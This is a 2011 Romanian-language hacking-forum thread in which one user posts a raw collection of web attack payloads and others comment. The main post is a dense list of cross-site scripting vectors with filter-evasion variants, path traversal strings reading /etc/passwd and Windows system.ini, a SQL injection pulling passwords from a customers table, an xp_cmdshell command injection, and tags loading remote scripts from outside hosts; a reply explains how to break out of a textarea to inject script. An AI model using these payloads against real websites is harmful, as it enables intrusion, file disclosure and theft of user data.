Guest expl0iter Posted June 14, 2011 Report Share Posted June 14, 2011 (edited) '><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerable)</script>%3Cscript%3Ealert('XSS')%3C/script%3E<script>alert('XSS')</script><img src="javascript:alert('XSS')">%0a%0a<script>alert(\"Vulnerable\")</script>.jsp%22%3cscript%3ealert(%22xss%22)%3c/script%3e%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html%3f.jsp%3f.jsp<script>alert('Vulnerable');</script><script>alert('Vulnerable')</script>?sql_debug=1a%5c.aspxa.jsp/<script>alert('Vulnerable')</script>a/a?<script>alert('Vulnerable')</script>"><script>alert('Vulnerable')</script>';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Ealert(document. domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini'';!--"<XSS>=&{()}<IMG SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><IMG SRC=JaVaScRiPt:alert("XSS")><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC="jav ascript:alert('XSS');"><IMG SRC="javascript:alert('XSS');"><IMG SRC="javascript:alert('XSS');">"<IMG SRC=java\0script:alert(\"XSS\")>";' > out<IMG SRC=" javascript:alert('XSS');"><SCRIPT>a=/XSS/alert(a.source)</SCRIPT><BODY BACKGROUND="javascript:alert('XSS')"><BODY ONLOAD=alert('XSS')><IMG DYNSRC="javascript:alert('XSS')"><IMG LOWSRC="javascript:alert('XSS')"><BGSOUND SRC="javascript:alert('XSS');"><br size="&{alert('XSS')}"><LAYER SRC="http://xss.ha.ckers.org/a.js"></layer><LINK REL="stylesheet" HREF="javascript:alert('XSS');"><IMG SRC='vbscript:msgbox("XSS")'><IMG SRC="mocha:[cod]"><IMG SRC="livescript:[cod]"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><IFRAME SRC=javascript:alert('XSS')></IFRAME><FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET><TABLE BACKGROUND="javascript:alert('XSS')"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"><DIV STYLE="width: expression(alert('XSS'));"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE='xss:expre\ssion(alert("XSS"))'><STYLE TYPE="text/javascript">alert('XSS');</STYLE><STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><BASE HREF="javascript:alert('XSS');//">getURL("javascript:alert('XSS')")a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);<XML SRC="javascript:alert('XSS');">"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT><IMG SRC="javascript:alert('XSS')"<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"><SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A> Edited June 14, 2011 by expl0iter Quote Link to comment Share on other sites More sharing options...
pr00f Posted June 14, 2011 Report Share Posted June 14, 2011 (edited) De când expresiile gen "' or 0=0 --" sunt pentru eviden?ierea XSS-ului ?Totu?i, mai g?si?i ?i aici.// Editeaz? ?i liniile :../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini Edited June 14, 2011 by pr00f Quote Link to comment Share on other sites More sharing options...
Guest expl0iter Posted June 14, 2011 Report Share Posted June 14, 2011 De când expresiile gen "' or 0=0 --" sunt pentru eviden?ierea XSS-ului ?Totu?i, mai g?si?i ?i aici.AAm editat.Le aveam salvate intr-un .txt si erau ratacite si alea pe acolo:PSOZ Quote Link to comment Share on other sites More sharing options...
totti93 Posted June 15, 2011 Report Share Posted June 15, 2011 LFI pe Linux si Windows../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.iniSQLi1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=Si de ce iti trebuie atata cand iti dai seama din ce input ti se afiseaza pe pagina... Te uiti in sursa si vezi. Ex: Dai valoarea "RST" intr-un input si iti afiseaza in felul urmator:<textarea>RST</textarea>Deci vei stii ca tre sa introduci scriptul in felul urmator:</textarea><script>cod</script> Quote Link to comment Share on other sites More sharing options...
cristi_89 Posted June 15, 2011 Report Share Posted June 15, 2011 frumoasa colectie expl0iter Tie nu ti-a dat Nytro ban in prima zi? Quote Link to comment Share on other sites More sharing options...